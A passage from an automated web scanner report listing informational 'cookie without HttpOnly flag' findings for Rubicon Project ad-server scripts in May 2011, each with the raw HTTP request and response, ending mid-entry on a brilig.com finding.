rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; rdk15=0; ses15=13549^1&13264^1; csi15=3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; rdk=7858/13549; rdk2=0; ses2=12590^1&13549^1; csi2=3200913.js^1^1304949680^1304949680&3196046.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:04:49 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:04:49 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:04:49 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1&13264^1&12590^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64510; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3196048.js^1^1304949889^1304949889&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; expires=Mon, 16-May-2011 14:04:49 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2211

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196048"
...[SNIP]...
10.84. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22782-2.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22782-2.js?cb=0.24485393334180117&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk15=0; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670; rdk=7858/13549; rdk9=0; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:02:16 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:02:16 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 15:02:16 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64663; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3196046.js^1^1304949736^1304949736; expires=Mon, 16-May-2011 14:02:16 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2210

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196046"
...[SNIP]...
10.85. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22893-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22893-15.js?cb=0.14613070245832205&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses2=12590^1&13549^1; csi2=3200913.js^1^1304949680^1304949680&3196046.js^1^1304949680^1304949680; rdk=7856/12590; rdk15=0; ses15=13549^1&13264^1&12590^1; csi15=3173215.js^1^1304949690^1304949690&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:50 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:06:50 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:06:50 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1&13264^1&12590^2; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64389; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3196048.js^1^1304950010^1304950010&3173215.js^1^1304949690^1304949690&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; expires=Mon, 16-May-2011 14:06:50 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2211

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196048"
...[SNIP]...
10.86. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22893-2.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22893-2.js?cb=0.7725758128799498&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses2=12590^1&13549^1; csi2=3200913.js^1^1304949680^1304949680&3196046.js^1^1304949680^1304949680; rdk=7856/12590; rdk15=0; ses15=13549^1&13264^1&12590^2; csi15=3173215.js^2^1304949690^1304949693&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:58 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:06:58 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 15:06:58 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^2&13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64381; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3196046.js^2^1304949680^1304950018&3200913.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 14:06:58 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2210

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196046"
...[SNIP]...
10.87. http://optimized-by.rubiconproject.com/a/7858/13549/26630-15.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7858/13549/26630-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7858/13549/26630-15.js?cb=0.2465566643513739 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; csi9=3188005.js^1^1304340479^1304340479; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi15=3153732.js^1^1304367467^1304367467&3166422.js^1^1304366186^1304366186&3140642.js^2^1304363213^1304364698&3167237.js^2^1304361606^1304361617&3200915.js^1^1304360968^1304360968&3203914.js^3^1304360291^1304360963&3190993.js^3^1304358760^1304359002&3151969.js^2^1304340485^1304341092&3151966.js^2^1304340392^1304340510&3199969.js^1^1304340482^1304340482&3186719.js^2^1304340387^1304340476&3188306.js^1^1304340471^1304340471&3196947.js^1^1304340427^1304340427&3201778.js^1^1304340414^1304340414&3151650.js^3^1304340335^1304340359; ruid=154dab7990adc1d6f3372c12^8^1304807875^2915161843; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:24 GMT
Server: RAS/1.3 (Unix)
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: ruid=154dab7990adc1d6f3372c12^9^1304949684^2915161843; expires=Sun, 07-Aug-2011 14:01:24 GMT; max-age=7776000; path=/; domain=.rubiconproject.com;
Set-Cookie: rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; path=/; domain=.rubiconproject.com;
Set-Cookie: rdk=7858/13549; expires=Mon, 09-May-2011 15:01:24 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:01:24 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64715; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3200915.js^1^1304949684^1304949684; expires=Mon, 16-May-2011 14:01:24 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2029

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3200915"
...[SNIP]...
10.88. http://optimized-by.rubiconproject.com/a/7858/13549/26630-2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7858/13549/26630-2.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7858/13549/26630-2.js?cb=0.004363113781437278 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670; rdk9=0; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; rdk=7856/12590; rdk2=0; ses2=12590^1; csi2=3196046.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:12 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7858/13549; expires=Mon, 09-May-2011 15:03:12 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 15:03:12 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^1&13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64607; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3200913.js^1^1304949792^1304949792&3196046.js^1^1304949680^1304949680; expires=Mon, 16-May-2011 14:03:12 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2027

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3200913"
...[SNIP]...
10.89. http://optimized-by.rubiconproject.com/a/7858/13549/26633-9.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7858/13549/26633-9.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7858/13549/26633-9.js?cb=0.8043483311776072 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; csi9=3188005.js^1^1304340479^1304340479; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=7858/13549; rdk15=0; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:30 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7858/13549; expires=Mon, 09-May-2011 15:01:30 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk9=0; expires=Mon, 09-May-2011 15:01:30 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses9=13549^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64709; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi9=3151664.js^1^1304949690^1304949690; expires=Mon, 16-May-2011 14:01:30 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2402

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3151664"
...[SNIP]...
10.90. http://optimized-by.rubiconproject.com/a/8201/13264/25249-15.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/8201/13264/25249-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/8201/13264/25249-15.js?cb=0.48162996326573193 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk15=0; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670; rdk=7858/13549; rdk9=0; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:03:01 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=8201/13264; expires=Mon, 09-May-2011 15:03:01 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:03:01 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1&13264^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64618; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3200915.js^1^1304949781^1304949781&3151665.js^1^1304949670^1304949670; expires=Mon, 16-May-2011 14:03:01 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2198

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3200915"
...[SNIP]...
10.91. http://p.brilig.com/contact/bct  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.brilig.com
Path:   /contact/bct

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

